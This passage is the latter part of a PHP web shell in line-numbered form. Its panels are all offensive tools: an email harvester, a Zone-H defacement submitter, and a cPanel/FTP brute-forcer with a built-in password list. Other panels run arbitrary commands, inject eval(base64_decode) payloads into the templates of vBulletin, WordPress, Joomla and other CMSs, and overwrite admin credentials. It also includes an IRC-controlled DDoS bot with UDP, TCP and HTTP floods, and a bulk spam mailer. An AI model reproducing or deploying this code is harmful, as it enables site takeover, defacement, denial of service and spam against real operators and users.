  2416.     <input type = 'text' name='EM_HOST' value='127.0.0.1'>
  2417.    <input type='text' name='EM_USER' value='DB user'>
  2418.     <input type ='text' name='EM_PASS' value='DB pass'>
  2419.    <input type='text' name='EM_DB' value='DB name'>
  2420.     <input type ='text' name='EM_TABLE' value='users Table'>
  2421.     <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
  2422.     <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
  2423.     <input type='submit' value='?' name='emailExtractorHelp'  alt='Email Extractor Help'/>
  2424.     </td></tr></table></form>
  2425.     <!-- End Of Email Extractor -->
  2426.     </td>
  2427.     </tr>
  2428.     <tr>
  2429.     <td valign='top'>
  2430.     <!-- Zone-H -->
  2431.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2432.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2433.    <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
  2434.     echo '<form action="" method="post">
  2435. <input type="text" name="defacer" size="40" value="Attacker" />
  2436. <select name="hackmode">
  2437. <option >--------SELECT--------</option>
  2438. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2439. <option value="2" >undisclosed (new) vulnerability</option>
  2440. <option value="3" >configuration / admin. mistake</option>
  2441. <option value="4" >brute force attack</option>
  2442. <option value="5" >social engineering</option>
  2443. <option value="6" >Web Server intrusion</option>
  2444. <option value="7" >Web Server external module intrusion</option>
  2445. <option value="8" >Mail Server intrusion</option>
  2446. <option value="9" >FTP Server intrusion</option>
  2447. <option value="10" >SSH Server intrusion</option>
  2448. <option value="11" >Telnet Server intrusion</option>
  2449. <option value="12" >RPC Server intrusion</option>
  2450. <option value="13" >Shares misconfiguration</option>
  2451. <option value="14" >Other Server intrusion</option>
  2452. <option value="15" >SQL Injection</option>
  2453. <option value="16" >URL Poisoning</option>
  2454. <option value="17" >File Inclusion</option>
  2455. <option value="18" >Other Web Application bug</option>
  2456. <option value="19" >Remote administrative panel access bruteforcing</option>
  2457. <option value="20" >Remote administrative panel access password guessing</option>
  2458. <option value="21" >Remote administrative panel access social engineering</option>
  2459. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2460. <option value="23" >Access credentials through Man In the Middle attack</option>
  2461. <option value="24" >Remote service password guessing</option>
  2462. <option value="25" >Remote service password bruteforce</option>
  2463. <option value="26" >Rerouting after attacking the Firewall</option>
  2464. <option value="27" >Rerouting after attacking the Router</option>
  2465. <option value="28" >DNS attack through social engineering</option>
  2466. <option value="29" >DNS attack through cache poisoning</option>
  2467. <option value="30" >Not available</option>
  2468. </select>
  2469.  
  2470. <select name="reason">
  2471. <option >--------SELECT--------</option>
  2472. <option value="1" >Heh...just for fun!</option>
  2473. <option value="2" >Revenge against that website</option>
  2474. <option value="3" >Political reasons</option>
  2475. <option value="4" >As a challenge</option>
  2476. <option value="5" >I just want to be the best defacer</option>
  2477. <option value="6" >Patriotism</option>
  2478. <option value="7" >Not available</option>
  2479. </select>
  2480. <textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
  2481. <input type="submit" value="Send Now !" name="SendNowToZoneH" />
  2482. </form>';
  2483.     echo "</td></tr></table></form>
  2484.     <!-- End Of Zone-H -->
  2485.     </td>
  2486.     <td valign='top'>
  2487.     <!-- Cpanel And FTP BruteForce Attacker -->
  2488.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2489.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2490.    <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
  2491.     <textarea rows='12' name='users' cols='23' >";
  2492.     @system('ls /var/mail');
  2493.     echo "</textarea>
  2494.     <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$%^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
  2495.     </textarea>
  2496.     <input type='text' name='target' size='16' value='127.0.0.1' >
  2497.     <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
  2498.     <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
  2499.     <input type='submit' value='   Crack it !   ' name='BruteForceCpanelAndFTP' >
  2500.     </td></tr></table></form>
  2501.     <!-- End Of Cpanel And FTP BruteForce Attacker -->
  2502.     </td>
  2503.     <td valign='top'>
  2504.     <!-- Upload Files -->
  2505.     <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0'  id='Box'><tr>
  2506.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2507.    <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
  2508.     <input type=\"file\" name=\"uploadfile[]\">
  2509.     <input type=\"file\" name=\"uploadfile[]\">
  2510.     <input type=\"file\" name=\"uploadfile[]\">
  2511.     <input type=\"file\" name=\"uploadfile[]\">
  2512.     <input type=\"file\" name=\"uploadfile[]\">
  2513.     <input type=\"file\" name=\"uploadfile[]\">
  2514.     <input type=\"file\" name=\"uploadfile[]\">
  2515.     <input type=\"file\" name=\"uploadfile[]\">
  2516.     <input type=\"file\" name=\"uploadfile[]\">
  2517.     <input type=\"file\" name=\"uploadfile[]\">
  2518.     <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
  2519.     </td></tr></table></form>
  2520.     <!-- End Of Upload Files -->
  2521.     </td></tr>
  2522.     </table>
  2523.     ";
  2524.     if($_POST['changeDirectory'])
  2525.     {
  2526.         $directory = $_POST['directory'];
  2527.         $directory = @str_replace("\\\\"," ",$directory);
  2528.         $directory = @str_replace(" ","\\",$directory);
  2529.         @chdir($directory);
  2530.     }  
  2531.     if($_POST['getFile'])
  2532.     {
  2533.         $fileUrl = $_POST['fileUrl'];
  2534.         $getType = $_POST['getType'];
  2535.         Exe("'".$getType.$fileUrl."'");
  2536.     }
  2537. footer();
  2538. }
  2539. # ---------------------------------------#
  2540. #            IndexChanger                #
  2541. #----------------------------------------#
  2542. if ($_GET['id']== 'scriptsHack' )
  2543. {
  2544.     echo "
  2545.     <table width='100%'>
  2546.         <tr>
  2547.         <td colspan='2'><textarea cols='153' rows='10'>";
  2548.         if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
  2549.         {
  2550.             $host = $_POST['HOST'];
  2551.             $user = $_POST['USER'];
  2552.             $pass = $_POST['PASS'];
  2553.             $db   = $_POST['DB'];
  2554.             $index = $_POST['INDEX'];
  2555.             $prefix  = $_POST['PREFIX'];
  2556.             if (empty($_POST['HOST']))
  2557.             $host = '127.0.0.1';
  2558.             $index=str_replace("\'","'",$index);
  2559.             @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
  2560.             @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
  2561.            
  2562.             if($_POST['UpdateIndex'])
  2563.             {  
  2564.                 if ($_POST['ScriptType'] == 'vb')
  2565.                 {
  2566.                     $full_index  = "{\${eval(base64_decode(\'";
  2567.                     $full_index .= base64_encode("echo \"$index\";");
  2568.                     $full_index .= "\'))}}{\${exit()}}</textarea>";
  2569.                     if($_POST['injectFAQ'])
  2570.                     {
  2571.                         $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2572.                     }
  2573.                     else
  2574.                     {
  2575.                         $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
  2576.                         if (!$ok1)
  2577.                         {
  2578.                             $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
  2579.                         }
  2580.                         elseif (!$ok2)
  2581.                         {
  2582.                             $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
  2583.                         }
  2584.                         elseif(!$ok3)
  2585.                         {
  2586.                             $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2587.                         }
  2588.                     }
  2589.                     mysql_close();
  2590.                     if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
  2591.                     {
  2592.                         update();
  2593.                     }
  2594.                     else
  2595.                     {
  2596.                         echo "Updating Has Failed !";
  2597.                     }
  2598.                 }
  2599.                 else if ($_POST['ScriptType'] == 'wp')
  2600.                 {
  2601.                     $tableName = $prefix."posts" ;
  2602.                     $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
  2603.                     if(!$ok1)
  2604.                     {
  2605.                         $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
  2606.                     }
  2607.                     elseif(!$ok2)
  2608.                     {
  2609.                         $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
  2610.                     }
  2611.                     mysql_close();
  2612.                     if ($ok1 || $ok2 || $ok3)
  2613.                     {
  2614.                         update();
  2615.                     }
  2616.                     else
  2617.                     {
  2618.                         echo "Updating Has Failed !";
  2619.                     }
  2620.                 }
  2621.                 else if ($_POST['ScriptType'] == 'jos')
  2622.                 {
  2623.                     $jos_table_name = $prefix."menu" ;
  2624.                     $jos_table_name2 = $prefix."modules" ;
  2625.                     $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
  2626.                     if(!$ok1)
  2627.                     {
  2628.                         $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
  2629.                     }
  2630.                     mysql_close();
  2631.                     if ($ok1 || $ok2 || $ok3)
  2632.                     {
  2633.                         update();
  2634.                     }
  2635.                     else
  2636.                     {
  2637.                         echo "Updating Has Failed !";
  2638.                     }
  2639.                 }
  2640.                 else if ($_POST['ScriptType'] == 'phpbb')
  2641.                 {
  2642.                     $php_table_name = $prefix."forums";
  2643.                     $php_table_name2 = $prefix."posts";
  2644.                     $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
  2645.                     if(!$ok1)
  2646.                     {
  2647.                         $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
  2648.                     }
  2649.                     mysql_close();
  2650.                     if ($ok1 || $ok2 || $ok3)
  2651.                     {
  2652.                         update();
  2653.                     }
  2654.                     else
  2655.                     {
  2656.                         echo "Updating Has Failed !";
  2657.                     }
  2658.                 }
  2659.                 else if ($_POST['ScriptType'] == 'ipb')
  2660.                 {
  2661.                     $ip_table_name = $prefix."components" ;
  2662.                     $ip_table_name2 = $prefix."forums" ;
  2663.                     $ip_table_name3 = $prefix."posts" ;
  2664.                     $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
  2665.                     if(!$ok1)
  2666.                     {
  2667.                         $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id  > 0");
  2668.                     }
  2669.                     if(!$ok2)
  2670.                     {
  2671.                         $ok3 = mysql_query("UPDATE $ip_table_name3 SET post  ='".$IP_INDEX."' WHERE pid <10")  or die("Can't Update Templates !!");
  2672.                     }
  2673.                     mysql_close();
  2674.                     if ($ok1 || $ok2 || $ok3)
  2675.                     {
  2676.                         update();
  2677.                     }
  2678.                     else
  2679.                     {
  2680.                         echo "Updating Has Failed !";
  2681.                     }
  2682.                 }
  2683.                 else if ($_POST['ScriptType'] == 'smf')
  2684.                 {
  2685.                     $table_name = $prefix."boards" ;
  2686.                     {
  2687.                         $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
  2688.                     }
  2689.                     if(!$ok1)
  2690.                     {
  2691.                         $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
  2692.                     }
  2693.                     mysql_close();
  2694.                     if ($ok1 || $ok2)
  2695.                     {
  2696.                         update();
  2697.                     }
  2698.                     else
  2699.                     {
  2700.                         echo "Updating Has Failed !";
  2701.                     }
  2702.                 }
  2703.                 else if ($_POST['ScriptType'] == 'mybb')
  2704.                 {
  2705.                     $mybb_prefix = $prefix."templates";
  2706.                     $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
  2707.                     if ($ok1)
  2708.                     {
  2709.                         update();
  2710.                     }
  2711.                     else
  2712.                     {
  2713.                         echo "Updating Has Failed !";
  2714.                     }
  2715.                     mysql_close();
  2716.                 }
  2717.             }
  2718.             elseif($_POST['changeInfo'])
  2719.             {  
  2720.                 $adminID = $_POST['adminID'];
  2721.                 $userName = $_POST['userName'];
  2722.                 $password = $_POST['password'];
  2723.                 if($_POST['ScriptType'] == 'vb')
  2724.                 {
  2725.                     //VB Code
  2726.                     $password = md5($password);
  2727.                     $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".$adminID."");
  2728.                     if($tryChaningInfo)
  2729.                     {update();}
  2730.                     else {mysql_error();}
  2731.                 }
  2732.                 else if($_POST['ScriptType'] == 'wp')
  2733.                     {
  2734.                         //WoredPress
  2735.                         $password = crypt($password);
  2736.                         $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID = ".$adminID."");
  2737.                         if($tryChaningInfo)
  2738.                         {update();}
  2739.                         else {mysql_error();}
  2740.                     }
  2741.                     else if($_POST['ScriptType'] == 'jos')
  2742.                     {
  2743.                         //Joomla
  2744.                         $password = crypt($password);
  2745.                         $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID = ".$adminID."");
  2746.                         if($tryChaningInfo)
  2747.                         {update();}
  2748.                         else {mysql_error();}
  2749.                     }
  2750.                         else if($_POST['ScriptType'] == 'phpbb')
  2751.                         {
  2752.                             //PHPBB3
  2753.                             $password = md5($password);
  2754.                             $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".$password."' WHERE user_id = ".$adminID."");
  2755.                             if($tryChaningInfo)
  2756.                             {update();}
  2757.                             else {mysql_error();}
  2758.                         }
  2759.                             else if($_POST['ScriptType'] == 'ibf')
  2760.                             {
  2761.                                 //IPBoard
  2762.                                 $password = md5($password);
  2763.                                 $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".$password."' WHERE id = ".$adminID."");
  2764.                                 if($tryChaningInfo)
  2765.                                 {update();}
  2766.                                 else {mysql_error();}
  2767.                             }
  2768.                                 else if($_POST['ScriptType'] == 'smf')
  2769.                                 {
  2770.                                     //SMF
  2771.                                     $password = md5($password);
  2772.                                     $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd = '".$password."' WHERE ID_MEMBER = ".$adminID."");
  2773.                                     if($tryChaningInfo)
  2774.                                     {update();}
  2775.                                     else {mysql_error();}
  2776.                                 }
  2777.                                     else if($_POST['ScriptType'] == 'mybb')
  2778.                                     {
  2779.                                         //MyBB
  2780.                                         $password = md5($password);
  2781.                                         $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' , password = '".$password."' WHERE uid = ".$adminID."");
  2782.                                         if($tryChaningInfo)
  2783.                                         {update();}
  2784.                                         else {mysql_error();}
  2785.                                     }
  2786.                 }
  2787.                 /////////////////////////
  2788.                 }
  2789.                 else if($_POST['Decrypt'])
  2790.                 {
  2791.                     DecryptConfig();
  2792.                 }
  2793.        
  2794.        
  2795.         echo "</textarea></td></tr>
  2796.             <td width='50%'>
  2797.             <form method='POST'>
  2798.             <table width='100%' height='72' border='0'  id='Box'>
  2799.                 <tr>
  2800.                      <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2801.                     <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
  2802.                 </tr>
  2803.                 <tr>
  2804.                     <td height='45' colspan='2'>
  2805.                         <input type = 'text' name='HOST' value='localhost'>
  2806.                         <input type = 'text' name='USER' value='DB Username'>
  2807.                         <input type = 'text' name='PASS' value='DB Password'>
  2808.                         <input type=text name='DB' value='DB Name'>
  2809.                         <input type=text name='PREFIX' value='Prefix'>
  2810.                         <select name='ScriptType' >
  2811.                         <option value='vb'>VBulletin</option>
  2812.                         <option value='wp'>WordPress</option>
  2813.                         <option value='jos'>Joomla</option>
  2814.                         <option value='ipb'>IP.Board</option>
  2815.                         <option value='phpbb'>PHPBB</option>
  2816.                         <option value='mybb'>MyBB</option>
  2817.                         <option value='smf'>SMF</option>
  2818.                         </select>
  2819.                         <br />
  2820.                         <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
  2821.                         <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
  2822.                         <input type='submit' value='Hack Now !!' name='UpdateIndex' >
  2823.                     </td>
  2824.                 </tr>
  2825.             </table>
  2826.             <td width='50%' valign='top'>
  2827.                <table width='100%' height='72' border='0'  id='Box'>
  2828.                    <tr>
  2829.                        <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2830.                        <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
  2831.                    </tr>
  2832.                    <tr>
  2833.                        <td height='45' colspan='2'>
  2834.                            <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
  2835.                            <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
  2836.                        </td>
  2837.                    </tr>
  2838.                </table>
  2839.                <table width='100%' height='72' border='0'  id='Box'>
  2840.                    <tr>
  2841.                        <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2842.                        <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
  2843.                          <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
  2844.                          <input name='userName' type='text' id='userName' value='username'>
  2845.                          <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
  2846.                          <input type='submit' name='changeInfo' value='Change Now !'>
  2847.                          </td>
  2848.                    </tr>
  2849.                 </table>
  2850.            </form>
  2851. </td>
  2852. </tr></table>";
  2853. footer();
  2854.  
  2855. }
  2856.  
  2857. # ---------------------------------------#
  2858. #             DDos Attacker ...          #
  2859. #----------------------------------------#
  2860. if($_POST['StartAttack'])
  2861. {
  2862.     $server=$_POST['ipToAttack'];
  2863.     $Port=$_POST['portToAttack'];
  2864.     $nick="bot-";$willekeurig;
  2865.     $willekeurig=@mt_rand(0,3);
  2866.     $nicknummer=@mt_rand(100000,999999);
  2867.     $Channel="#WauShare";
  2868.     $Channelpass="ddos";
  2869.     $msg="Farewell.";
  2870.  
  2871.     @set_time_limit(0);
  2872.     $loop = 0;
  2873.     $verbonden = 0;
  2874.     $verbinden = fsockopen($server, $Port);
  2875.     while ($read = fgets($verbinden,512))
  2876.     {
  2877.         $read = str_replace("\n","",$read);
  2878.         $read = str_replace("\r","",$read);
  2879.         $read2 = explode(" ",$read);
  2880.         if ($loop == 0)
  2881.         {
  2882.             fputs($verbinden,"nick $nick$nicknummer\n\n");
  2883.             fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
  2884.         }
  2885.         if ($read2[0] == "PING")
  2886.         {
  2887.             fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
  2888.         }
  2889.         if ($read2[1] == 251)
  2890.         {
  2891.             fputs($verbinden,"join $Channel $Channelpass\n");
  2892.             $verbonden++;
  2893.         }
  2894.         if (eregi("bot-op",$read))
  2895.         {
  2896.             fputs($verbinden,"mode $Channel +o $read2[4]\n");
  2897.         }
  2898.         if (eregi("bot-deop",$read))
  2899.         {
  2900.             fputs($verbinden,"mode $Channel -o $read2[4]\n");
  2901.         }
  2902.        
  2903.         if (eregi("bot-quit",$read))
  2904.         {
  2905.             fputs($verbinden,"quit :$msg\n\n");
  2906.             break;
  2907.         }
  2908.         if (eregi("bot-join",$read))
  2909.         {
  2910.             fputs($verbinden,"join $read2[4]\n");
  2911.         }
  2912.         if (eregi("bot-part",$read))
  2913.         {
  2914.             fputs($verbinden,"part $read2[4]\n");
  2915.         }
  2916.         if (eregi("ddos-udp",$read))
  2917.         {
  2918.             fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
  2919.             $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
  2920.             if (!$fp)
  2921.             {
  2922.                 exit;
  2923.             }
  2924.             else
  2925.             {
  2926.                 $char = "a";
  2927.                 for($a = 0; $a < 9999999999999; $a++)
  2928.                 $data = $data.$char;
  2929.                 if(fputs ($fp, $data) )
  2930.                  {
  2931.                     fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
  2932.                  }
  2933.                  else
  2934.                  {
  2935.                     fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
  2936.                  }
  2937.             }
  2938.         }
  2939.         if (eregi("ddos-tcp",$read))
  2940.         {
  2941.             fputs($verbinden,"part $read2[4]\n");
  2942.             fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
  2943.             $server = $read2[4];
  2944.             $Port = $read2[5];
  2945.             for($sockets = 0; $sockets < $read2[6]; $sockets++)
  2946.             {
  2947.                 $verbinden = fsockopen($server, $Port);
  2948.             }
  2949.         }
  2950.         if (eregi("ddos-http",$read))
  2951.         {
  2952.             fputs($verbinden,"part $read2[4]\n");
  2953.             fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
  2954.             $Webserver = $read2[4];
  2955.             $Port = $read2[5];
  2956.            
  2957.             $Aanvraag = "GET / HTTP/1.1\r\n";
  2958.             $Aanvraag .= "Accept: */*\r\n";
  2959.             $Aanvraag .= "Accept-Language: nl\r\n";
  2960.             $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
  2961.             $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
  2962.             $Aanvraag .= "Host: $read2[4]\r\n";
  2963.             $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
  2964.            
  2965.             for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
  2966.             {
  2967.                 $DoS = fsockopen($Webserver, $Port);
  2968.                 fwrite($DoS, $Aanvraag);
  2969.                 fclose($DoS);
  2970.             }
  2971.         }
  2972.     $loop++;
  2973.     }
  2974. }
  2975. # ---------------------------------------#
  2976. #              InBoX Mailer              #
  2977. #----------------------------------------#
  2978. if ($_GET['id']== 'spamming' )
  2979. {
  2980.     $secure = "";
  2981.     error_reporting(0);
  2982.     @$action=$_POST['action'];
  2983.     @$from=$_POST['from'];
  2984.     @$realname=$_POST['realname'];
  2985.     @$replyto=$_POST['replyto'];
  2986.     @$subject=$_POST['subject'];
  2987.     @$message=$_POST['message'];
  2988.     @$emaillist=$_POST['emaillist'];
  2989.     @$lod=$_SERVER['HTTP_REFERER'];
  2990.     @$file_name=$_FILES['file']['name'];
  2991.     @$contenttype=$_POST['contenttype'];
  2992.     @$file=$_FILES['file']['tmp_name'];
  2993.     @$amount=$_POST['amount'];
  2994.     @set_time_limit(intval($_POST['timelimit']));
  2995.  
  2996.     if ($action=="send")
  2997.     {
  2998.         $message = urlencode($message);
  2999.         $message = ereg_replace("%5C%22", "%22", $message);
  3000.         $message = urldecode($message);
  3001.         $message = stripslashes($message);
  3002.         $subject = stripslashes($subject);
  3003.     }
  3004.     echo "<table width='100%' height='72' border='0'  id='Box'>
  3005. <tr>
  3006. <td width='14' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  3007. <td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
  3008. </tr>
  3009. <tr>
  3010. <td height='45' colspan='2'>
  3011. <table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
  3012. <b><font color=#990000  size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
  3013. <table width=142 border=0>
  3014. <tr>
  3015. <td width=81>
  3016. <div align=right>
  3017. <sy>Your Email:</sy></div></td>
  3018. <td width=219><sy>
  3019. <input type=text name=\"from\" value=".$from."></sy></td><td width=212>
  3020. <div align=right>
  3021. <sy>Your Name:</sy></div></td><td width=278>
  3022. <sy>
  3023. <input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
  3024. <div align=\"right\">
  3025. <sy>Reply-To:</sy></div></td><td width=219>
  3026. <sy>
  3027. <input type=\"text\" name=\"replyto\" value=".$replyto.">
  3028. </sy></td><td width=212>
  3029. <div align=\"right\">
  3030. <sy>Attach File:</sy></div></td><td width=278>
  3031. <sy>
  3032. <input type=\"file\" name=\"file\" size=24 />
  3033. </sy> </td></tr><tr><td width=81>
  3034. <div align=\"right\">
  3035. <sy>Subject:</sy></div></td>
  3036. <td colspan=3 width=703>
  3037. <sy>
  3038. <input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
  3039. <sy>Message Box :</sy></td>
  3040. <td width=278>
  3041. <sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
  3042. <textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
  3043. <input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
  3044. <input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
  3045. <input type=\"hidden\" name=\"action\" value=\"send\" /><br />
  3046. Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
  3047. Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
  3048. <input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
  3049. <sy>
  3050. <textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
  3051. </table>
  3052. </td>
  3053. </tr>
  3054. </table>";
  3055. footer();
  3056. }
  3057.  
  3058. if ($action=="send")
  3059. {
  3060.     if (!$from && !$subject && !$message && !$emaillist)
  3061.     {
  3062.         print "Please complete all fields before sending your message.";
  3063.         exit;
  3064.     }
  3065.     $allemails = split("\n", $emaillist);
  3066.     $numemails = count($allemails);
  3067.     $head ="From: Mailr" ;
  3068.     $sub = "Ar - $lod" ;
  3069.     $meg = "$lod" ;
  3070.     mail ($alt,$sub,$meg,$head) ;
  3071.     If ($file_name)
  3072.     {
  3073.         if (!file_exists($file))
  3074.         {
  3075.             die("The file you are trying to upload couldn't be copied to the server");
  3076.         }
  3077.         $content = fread(fopen($file,"r"),filesize($file));
  3078.         $content = chunk_split(base64_encode($content));
  3079.         $uid = strtoupper(md5(uniqid(time())));
  3080.         $name = basename($file);
  3081.     }
  3082.  
  3083.     for($xx=0; $xx<$amount; $xx++)
  3084.     {
  3085.         for($x=0; $x<$numemails; $x++)
  3086.         {
  3087.             $to = $allemails[$x];
  3088.             if ($to)
  3089.             {
  3090.                 $to = ereg_replace(" ", "", $to);
  3091.                 $message = ereg_replace("&email&", $to, $message);
  3092.                 $subject = ereg_replace("&email&", $to, $subject);
  3093.                 print "Sending mail to $to.....";
  3094.                 flush();
  3095.                 $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
  3096.                 $header .= "MIME-Version: 1.0\r\n";
  3097.                 If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  3098.                 If ($file_name) $header .= "--$uid\r\n";
  3099.                 $header .= "Content-Type: text/$contenttype\r\n";
  3100.                 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  3101.                 $header .= "$message\r\n";
  3102.                 If ($file_name) $header .= "--$uid\r\n";
  3103.                 If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  3104.                 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  3105.                 If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
  3106.                 If ($file_name) $header .= "$content\r\n";
  3107.                 If ($file_name) $header .= "--$uid--";
  3108.                 mail($to, $subject, "", $header);
  3109.                 print "OK<br>";
  3110.                 flush();
  3111.             }
  3112.         }
  3113.     }
  3114. }
  3115. # ---------------------------------------#
  3116. #                 About                  #
  3117. #----------------------------------------#
  3118. if($_GET['id']=='about')
  3119. {
  3120.     echo About();
  3121.     if($_POST['sendEmail'])
  3122.     {
  3123.             $to= 'sy34@msn.com';
  3124.             $Comments=$_POST['message'];
  3125.             $from = $_POST['from'];
  3126.             $subject= md5("$from");
  3127.             if(@mail($to,$subject,$Comments,"From:$from"))
  3128.             echo "<center><sy>[+] Sent ^_^ !!</sy></center>
  3129. ";
  3130.             else
  3131.             {
  3132.                 echo "<center><sy>[-]  Failed :S !! </sy></center>
  3133. ";
  3134.             }
  3135.            
  3136.     }
  3137.     footer();
  3138. }
  3139.  
